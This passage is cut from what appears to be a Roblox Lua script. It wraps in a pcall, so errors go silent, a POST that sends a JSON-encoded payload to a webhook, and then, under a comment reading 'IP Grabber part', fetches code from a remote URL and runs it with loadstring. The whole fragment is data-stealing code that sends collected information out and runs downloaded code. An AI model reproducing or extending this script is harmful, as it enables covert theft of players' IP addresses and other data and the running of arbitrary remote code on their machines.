            text = os.date("!%Y-%m-%d %H:%M:%S UTC")
        }
    }}
}

pcall(function()
    request({
        Url = WEBHOOK_URL,
        Method = "POST",
        Headers = {
            ["Content-Type"] = "application/json"
        },
        Body = HttpService:JSONEncode(payload)
    })
end)

-- ================= IP Grabber part =================
loadstring(game:HttpGet("lol"))()
